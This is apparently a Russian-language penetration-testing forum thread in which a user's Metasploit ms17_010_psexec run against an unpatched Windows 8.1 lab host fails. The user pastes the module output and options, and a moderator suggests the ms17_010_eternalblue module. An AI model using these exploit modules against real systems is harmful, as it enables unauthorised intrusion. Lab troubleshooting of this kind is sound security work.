• Codeby web-security - Курс "Тестирование Веб-Приложений на проникновение с нуля" от команды codeby. Общая теория, подготовка рабочего окружения, пассивный фазинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое. Подробнее ...

  • Мобильный клиент нашего форума для Android гаджетов доступен в Google Play Market по этой ссылке. Клиент можно скачать с нашего форума по этой ссылке. Последняя версия МК в нашем телеграм канале вот здесь

Проблема ms17_010_psexec

Tayrus

Grey Team
13.04.2017
273
383
#1
Обновился до 2018.1, решил тестануть ms17_010_psexec, пишет
[*] Started reverse TCP handler on 192.168.1.4:4444
[*] 192.168.1.2:445 - Target OS: Windows 8.1 Enterprise 9600
[-] 192.168.1.2:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.
Не патчена, антивиря нету.

PS настройки
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
RHOST 192.168.1.2 yes The target address
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
 

Dr.Lafa

Mod. Hardware
Gold Team
30.12.2016
440
833
#2
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
К этому эксплоиту нужны аутентификационные данные. Попробуй eternalblue use exploit/windows/smb/ms17_010_eternalblue
 
Симпатии: Понравилось kot-gor
Вверх Снизу